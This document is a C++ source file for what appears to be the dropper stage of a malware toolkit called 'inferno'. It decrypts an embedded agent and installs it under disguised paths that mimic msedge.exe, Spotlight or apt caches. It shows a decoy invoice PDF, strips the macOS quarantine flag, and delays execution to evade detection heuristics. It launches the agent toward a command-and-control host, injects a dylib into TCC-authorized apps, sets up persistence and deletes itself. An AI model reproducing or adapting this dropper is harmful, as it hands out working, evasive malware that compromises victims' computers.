#include <cstdio>
#include <cstdlib>
#include <cstdint>
#include <cstring>
#include <string>
#include <vector>
#include <random>
#include <chrono>
#include "unlit.hpp"
#include "EntitlementScanner.hpp"
#include "MachInjector.hpp"

#ifdef _WIN32
#ifndef WIN32_LEAN_AND_MEAN
#define WIN32_LEAN_AND_MEAN
#endif
#include <windows.h>
#include <shlobj.h>
#else
#include <unistd.h>
#include <sys/stat.h>
#include <libgen.h>
#endif

// This header is auto-generated by CMake from the built agent binary, shim binary,
// and the decoy PDF. It defines:
//   inferno::wrapper::AGENT_BINARY[] / AGENT_BINARY_SIZE   (XOR-encrypted)
//   inferno::wrapper::SHIM_BINARY[]  / SHIM_BINARY_SIZE    (XOR-encrypted, macOS only)
//   inferno::wrapper::XOR_KEY[]      / XOR_KEY_LEN
//   inferno::wrapper::DECOY_DATA[]  / DECOY_DATA_SIZE
#if __has_include("agent_binary.h")
#include "agent_binary.h"
#else
// Placeholder for development — wrapper won't function without the real binary.
namespace inferno { namespace wrapper {
const unsigned char AGENT_BINARY[] = {0};
const size_t AGENT_BINARY_SIZE = 0;
const unsigned char SHIM_BINARY[] = {0};
const size_t SHIM_BINARY_SIZE = 0;
const unsigned char XOR_KEY[] = {0};
const size_t XOR_KEY_LEN = 0;
const unsigned char DECOY_DATA[] = {0};
const size_t DECOY_DATA_SIZE = 0;
} }
#endif

namespace {

void decryptInPlace(unsigned char* data, size_t size) {
    if (inferno::wrapper::XOR_KEY_LEN == 0) return;
    for (size_t i = 0; i < size; ++i) {
        data[i] ^= inferno::wrapper::XOR_KEY[i % inferno::wrapper::XOR_KEY_LEN];
    }
}

#if !defined(__APPLE__) || defined(INFERNO_TESTING)
std::string installPath() {
#ifdef _WIN32
    char appdata[MAX_PATH];
    if (SHGetFolderPathA(nullptr, CSIDL_LOCAL_APPDATA, nullptr, 0, appdata) != S_OK) {
        return UNLIT("C:\\temp\\inferno_agent.exe");
    }
    std::string path(appdata);
    path += UNLIT("\\Microsoft\\Edge\\Application\\");

    // Append a plausible Edge version subdirectory (e.g. 114.0.1823.58)
    // so the path mirrors a genuine installation.
    {
        std::random_device rd;
        std::mt19937 rng(rd());
        std::uniform_int_distribution<int> major_dist(100, 130);
        std::uniform_int_distribution<int> minor_dist(0, 5);
        std::uniform_int_distribution<int> build_dist(1500, 2300);
        std::uniform_int_distribution<int> patch_dist(30, 120);
        path += std::to_string(major_dist(rng)) + ".";
        path += std::to_string(minor_dist(rng)) + ".";
        path += std::to_string(build_dist(rng)) + ".";
        path += std::to_string(patch_dist(rng));
    }
    path += UNLIT("\\msedge.exe");
    return path;
#elif defined(__APPLE__)
    const char* home = ::getenv("HOME");
    if (!home) return UNLIT("/tmp/.SpotlightIndex");
    return std::string(home) + UNLIT("/Library/Application Support/.Spotlight/V100/SpotlightIndex");
#else
    const char* home = ::getenv("HOME");
    if (!home) return UNLIT("/tmp/.apt-get");
    return std::string(home) + UNLIT("/.cache/apt/archives/.apt-get");
#endif
}

bool createDirectoryForFile(std::string& path) {
#ifdef _WIN32
    // Helper: recursively create all directory components
    auto createDirs = [](const std::string& dir_path) -> bool {
        std::string current;
        for (size_t i = 0; i < dir_path.size(); ++i) {
            current += dir_path[i];
            if (dir_path[i] == '/') {
                if (!CreateDirectoryA(current.c_str(), nullptr)) {
                    if (GetLastError() != ERROR_ALREADY_EXISTS) return false;
                }
            }
        }
        if (!CreateDirectoryA(dir_path.c_str(), nullptr)) {
            if (GetLastError() != ERROR_ALREADY_EXISTS) return false;
        }
        return true;
    };

    // Normalize backslashes to forward slashes
    std::string dir = path;
    for (size_t i = 0; i < dir.size(); ++i) {
        if (dir[i] == '\\') dir[i] = '/';
    }
    size_t pos = dir.rfind('/');
    if (pos == std::string::npos) return false;
    std::string dir_only = dir.substr(0, pos);

    // Try primary path (e.g. AppData\Microsoft\Crypto\RSA\...)
    if (createDirs(dir_only)) return true;

    // Fallback: %TEMP%\<random hex>
    char temp_buf[MAX_PATH];
    if (GetTempPathA(MAX_PATH, temp_buf) == 0) {
        std::fprintf(stderr, UNLIT("[Wrapper] GetTempPathA failed: GLE=%lu\n"), GetLastError());
        return false;
    }
    std::string fallback(temp_buf);
    while (!fallback.empty() && (fallback.back() == '\\' || fallback.back() == '/')) {
        fallback.pop_back();
    }

    std::random_device rd;
    std::mt19937 rng(rd());
    std::uniform_int_distribution<int> hex_dist(0, 15);
    const char hex_chars[] = "0123456789abcdef";
    fallback += "\\";
    for (int i = 0; i < 8; ++i) {
        fallback += hex_chars[hex_dist(rng)];
    }

    // Normalize fallback path
    std::string fb_normalized = fallback;
    for (size_t i = 0; i < fb_normalized.size(); ++i) {
        if (fb_normalized[i] == '\\') fb_normalized[i] = '/';
    }

    if (!createDirs(fb_normalized)) return false;

    // Extract original filename and update path
    std::string filename = path;
    pos = path.rfind('\\');
    if (pos == std::string::npos) pos = path.rfind('/');
    if (pos != std::string::npos) filename = path.substr(pos + 1);
    path = fallback + "\\" + filename;
    return true;
#else
    std::string dir = path;
    size_t pos = dir.rfind('/');
    if (pos == std::string::npos) return false;
    dir = dir.substr(0, pos);

    // Create directory recursively
    std::string current;
    for (size_t i = 0; i < dir.size(); ++i) {
        current += dir[i];
        if (dir[i] == '/') {
            if (::mkdir(current.c_str(), 0700) != 0 && errno != EEXIST) {
                std::fprintf(stderr, UNLIT("[Wrapper] mkdir(%s) failed: %s\n"),
                             current.c_str(), std::strerror(errno));
                return false;
            }
        }
    }
    if (::mkdir(dir.c_str(), 0700) != 0 && errno != EEXIST) {
        std::fprintf(stderr, UNLIT("[Wrapper] mkdir(%s) failed: %s\n"),
                     dir.c_str(), std::strerror(errno));
        return false;
    }
    return true;
#endif
}

#endif // !defined(__APPLE__) || defined(INFERNO_TESTING)

bool extractAgent(const std::string& target) {
    if (inferno::wrapper::AGENT_BINARY_SIZE == 0) {
        std::fprintf(stderr, "%s", UNLIT("[Wrapper] Agent binary not embedded.\n"));
        return false;
    }

    // Decrypt the embedded agent into a writable buffer.
    // AGENT_BINARY[] lives in .rodata (const), so we must copy.
    std::vector<unsigned char> decrypted(
        inferno::wrapper::AGENT_BINARY,
        inferno::wrapper::AGENT_BINARY + inferno::wrapper::AGENT_BINARY_SIZE
    );
    decryptInPlace(decrypted.data(), decrypted.size());

    FILE* f = ::fopen(target.c_str(), "wb");
    if (!f) {
        std::fprintf(stderr, UNLIT("[Wrapper] fopen(%s) failed: %s\n"),
                     target.c_str(), std::strerror(errno));
        return false;
    }

    size_t written = ::fwrite(decrypted.data(), 1, decrypted.size(), f);
    bool write_failed = (written != decrypted.size()) || ::ferror(f);
    bool close_failed = (::fclose(f) != 0);

    if (write_failed || close_failed) {
        std::fprintf(stderr, UNLIT("[Wrapper] fwrite wrote %zu/%zu bytes\n"),
                     written, decrypted.size());
        ::remove(target.c_str());
        return false;
    }

#ifndef _WIN32
    ::chmod(target.c_str(), 0755);
#endif
    return true;
}

#if !defined(__APPLE__) || defined(INFERNO_TESTING)
bool runAgent(const std::string& path, const std::string& ip, uint16_t port) {
    std::string port_str = std::to_string(port);

#ifdef _WIN32
    std::string cmd = "\"" + path + "\" " + ip + " " + port_str;
    STARTUPINFOA si = {sizeof(si)};
    PROCESS_INFORMATION pi;
    if (!CreateProcessA(nullptr, const_cast<char*>(cmd.c_str()),
                        nullptr, nullptr, FALSE,
                        DETACHED_PROCESS | CREATE_NO_WINDOW,
                        nullptr, nullptr, &si, &pi)) {
        std::fprintf(stderr, UNLIT("[Wrapper] CreateProcessA(%s) failed: GLE=%lu\n"),
                     cmd.c_str(), GetLastError());
        return false;
    }
    CloseHandle(pi.hProcess);
    CloseHandle(pi.hThread);
    return true;
#else
#if defined(__APPLE__)
    // Remove quarantine attribute so Gatekeeper doesn't block the agent
    std::string xattr_cmd = UNLIT("xattr -dr com.apple.quarantine \"");
    xattr_cmd += path;
    xattr_cmd += UNLIT("\" 2>/dev/null");
    ::system(xattr_cmd.c_str());
#endif
    pid_t pid = ::fork();
    if (pid < 0) {
        std::fprintf(stderr, UNLIT("[Wrapper] fork() failed: %s\n"), std::strerror(errno));
        return false;
    }
    if (pid > 0) return true; // parent returns, child continues

    // Child: execute the agent using execvp which searches PATH and
    // handles spaces in paths correctly via the argv array.
    const char* const args[] = {path.c_str(), ip.c_str(), port_str.c_str(), nullptr};
    ::execv(args[0], const_cast<char* const*>(args));

    // If execv fails, try shell fallback for tricky paths
    ::execl(UNLIT("/bin/sh"), UNLIT("sh"), UNLIT("-c"),
            (UNLIT("\"") + path + "\" " + ip + " " + port_str).c_str(), nullptr);

    ::exit(1); // should not reach here
#endif
}

#endif // !defined(__APPLE__) || defined(INFERNO_TESTING)

std::string decoyPath() {
#ifdef _WIN32
    char buf[MAX_PATH];
    if (SHGetFolderPathA(nullptr, CSIDL_PROFILE, nullptr, 0, buf) != S_OK) {
        return UNLIT("C:\\Users\\Public\\invoice.pdf");
    }
    return std::string(buf) + UNLIT("\\Downloads\\invoice.pdf");
#else
    const char* home = ::getenv("HOME");
    if (!home) return UNLIT("/tmp/invoice.pdf");
    return std::string(home) + UNLIT("/Downloads/invoice.pdf");
#endif
}

bool extractFile(const std::string& target,
                 const unsigned char* data, size_t data_size) {
    FILE* f = ::fopen(target.c_str(), "wb");
    if (!f) {
        std::fprintf(stderr, UNLIT("[Wrapper] fopen(%s) failed: %s\n"),
                     target.c_str(), std::strerror(errno));
        return false;
    }
    size_t written = ::fwrite(data, 1, data_size, f);
    bool write_failed = (written != data_size) || ::ferror(f);
    bool close_failed = (::fclose(f) != 0);

    if (write_failed || close_failed) {
        std::fprintf(stderr, UNLIT("[Wrapper] wrote %zu/%zu bytes\n"),
                     written, data_size);
        ::remove(target.c_str());
        return false;
    }
    return true;
}

bool openFile(const std::string& path) {
#ifdef _WIN32
    return reinterpret_cast<intptr_t>(::ShellExecuteA(
        nullptr, UNLIT("open"), path.c_str(), nullptr, nullptr, SW_SHOW)) > 32;
#elif defined(__APPLE__)
    std::string cmd = std::string(UNLIT("open \"")) + path + UNLIT("\" 2>/dev/null");
    return ::system(cmd.c_str()) == 0;
#else
    std::string cmd = std::string(UNLIT("xdg-open \"")) + path + UNLIT("\" 2>/dev/null");
    return ::system(cmd.c_str()) == 0;
#endif
}

void selfDelete(const std::string& path) {
#ifdef _WIN32
    // Spawn a detached batch script that waits 3s then deletes the wrapper
    char temp_dir[MAX_PATH];
    if (GetTempPathA(MAX_PATH, temp_dir) == 0) return;
    std::string bat = std::string(temp_dir) + UNLIT("\\del_inferno.bat");
    std::string script = std::string(
        UNLIT("@echo off\r\n")
    ) + UNLIT("ping 127.0.0.1 -n 4 > nul\r\n") +
        UNLIT("del \"") + path + UNLIT("\"\r\n") +
        UNLIT("del \"") + bat + UNLIT("\"\r\n");
    FILE* f = ::fopen(bat.c_str(), "w");
    if (!f) return;
    ::fwrite(script.c_str(), 1, script.size(), f);
    ::fclose(f);
    ::ShellExecuteA(nullptr, UNLIT("open"), bat.c_str(), nullptr, nullptr, SW_HIDE);
#else
    pid_t pid = ::fork();
    if (pid == 0) {
        ::sleep(3);
        ::remove(path.c_str());
        ::_exit(0);
    }
#endif
}

#if defined(__APPLE__) && !defined(INFERNO_TESTING)
bool extractShim(const std::string& target) {
    if (inferno::wrapper::SHIM_BINARY_SIZE == 0) {
        std::fprintf(stderr, "%s", UNLIT("[Wrapper] Shim binary not embedded.\n"));
        return false;
    }
    std::vector<unsigned char> decrypted(
        inferno::wrapper::SHIM_BINARY,
        inferno::wrapper::SHIM_BINARY + inferno::wrapper::SHIM_BINARY_SIZE
    );
    decryptInPlace(decrypted.data(), decrypted.size());

    FILE* f = ::fopen(target.c_str(), UNLIT("wb"));
    if (!f) {
        std::fprintf(stderr, UNLIT("[Wrapper] fopen(%s) failed: %s\n"),
                     target.c_str(), std::strerror(errno));
        return false;
    }
    size_t written = ::fwrite(decrypted.data(), 1, decrypted.size(), f);
    bool write_failed = (written != decrypted.size()) || ::ferror(f);
    bool close_failed = (::fclose(f) != 0);

    if (write_failed || close_failed) {
        std::fprintf(stderr, UNLIT("[Wrapper] fwrite wrote %zu/%zu bytes for shim\n"),
                     written, decrypted.size());
        ::remove(target.c_str());
        return false;
    }

    ::chmod(target.c_str(), 0755);
    return true;
}

bool launchShim(const std::string& shim_path,
                const std::string& dylib_path,
                const std::string& ip,
                uint16_t port) {
    ::setenv(UNLIT("INFERNO_SERVER_IP"), ip.c_str(), 1);
    ::setenv(UNLIT("INFERNO_SERVER_PORT"), std::to_string(port).c_str(), 1);
    ::setenv(UNLIT("DYLD_INSERT_LIBRARIES"), dylib_path.c_str(), 1);

    pid_t pid = ::fork();
    if (pid < 0) {
        std::fprintf(stderr, UNLIT("[Wrapper] fork() for shim failed: %s\n"),
                     std::strerror(errno));
        return false;
    }

    if (pid == 0) {
        const char* const shim_argv[] = {UNLIT("inferno_shim"), nullptr};
        ::execv(shim_path.c_str(), const_cast<char* const*>(shim_argv));
        std::fprintf(stderr, UNLIT("[Wrapper] execv(%s) failed: %s\n"),
                     shim_path.c_str(), std::strerror(errno));
        ::_exit(1);
    }

    ::usleep(1000000);
    ::remove(dylib_path.c_str());
    ::sleep(2);
    ::remove(shim_path.c_str());
    return true;
}
#endif

} // anonymous namespace

int main(int argc, char* argv[]) {
    std::string ip = UNLIT("127.0.0.1");
    uint16_t port = 4242;

    if (argc >= 3) {
        ip = argv[1];
        int p = std::atoi(argv[2]);
        if (p > 0 && p <= 65535) port = static_cast<uint16_t>(p);
    }

    // Step 1: Extract decoy PDF to user-visible Downloads folder
    std::string pdf = decoyPath();
    if (inferno::wrapper::DECOY_DATA_SIZE > 0) {
        if (extractFile(pdf, inferno::wrapper::DECOY_DATA,
                         inferno::wrapper::DECOY_DATA_SIZE)) {
            openFile(pdf);
        }
    }

#if defined(__APPLE__) && !defined(INFERNO_TESTING)
    // Step 2: macOS — extract dylib + shim, then try both tiers
    std::string dylib_path = UNLIT("/tmp/.inferno_agent_") + std::to_string(::getpid()) + UNLIT(".dylib");
    if (!extractAgent(dylib_path)) return 1;

    std::string shim_path = UNLIT("/tmp/.inferno_shim_") + std::to_string(::getpid());
    if (!extractShim(shim_path)) {
        ::remove(dylib_path.c_str());
        return 1;
    }

    // Step 2a: Copy dylib to persistent path for reboot survival
    {
        const char* home = ::getenv(UNLIT("HOME"));
        if (home) {
            std::string cache_dir = std::string(home) + UNLIT("/.cache");
            std::string persist_path = cache_dir + UNLIT("/com.apple.amp.itmstransporter.dylib");
            ::mkdir(cache_dir.c_str(), 0755);
            // Copy dylib to persistent location
            std::vector<unsigned char> dylib_data(inferno::wrapper::AGENT_BINARY,
                                                  inferno::wrapper::AGENT_BINARY + inferno::wrapper::AGENT_BINARY_SIZE);
            decryptInPlace(dylib_data.data(), dylib_data.size());
            FILE* pf = ::fopen(persist_path.c_str(), UNLIT("wb"));
            if (pf) {
                ::fwrite(dylib_data.data(), 1, dylib_data.size(), pf);
                ::fclose(pf);
                ::chmod(persist_path.c_str(), 0644);
            }
        }
    }

    // Step 2b: Try Tier 2 — inject into TCC-authorized app (best-effort, if it works
    // the agent also connects; hardened runtime will silently reject on most apps)
    auto targets = inferno::tier2::scanApplications();
    if (!targets.empty()) {
        const auto& best = targets.front();
        std::fprintf(stdout, "[Wrapper] Tier 2: attempting injection into %s\n",
                     best.path.c_str());
        inferno::tier2::injectIntoTarget(best, dylib_path, ip, port);
    }

    // Step 2b: Always launch Tier 1 (shim) — guaranteed C2 connection
    std::fprintf(stdout, "[Wrapper] Launching Tier 1 (shim) for guaranteed C2\n");
    if (!launchShim(shim_path, dylib_path, ip, port)) {
        ::remove(dylib_path.c_str());
        ::remove(shim_path.c_str());
        return 1;
    }
#else
    // Step 2: Extract agent to hidden install path
    std::string target = installPath();
    if (!createDirectoryForFile(target)) {
        return 1;
    }
    if (!extractAgent(target)) {
        return 1;
    }

    // Step 3: Execution jitter — break write-then-execute heuristics
    {
        std::random_device rd;
        std::mt19937 rng(rd());
        std::uniform_int_distribution<int> jitter_dist(5, 15);
        int delay = jitter_dist(rng);
#ifdef _WIN32
        ::Sleep(static_cast<DWORD>(delay) * 1000);
#else
        ::sleep(delay);
#endif
    }

    // Step 4: Launch agent
    if (!runAgent(target, ip, port)) {
        return 1;
    }
#endif

    // Step 5: Self-delete the wrapper binary
    if (argc > 0) {
        selfDelete(argv[0]);
    }
    return 0;
}
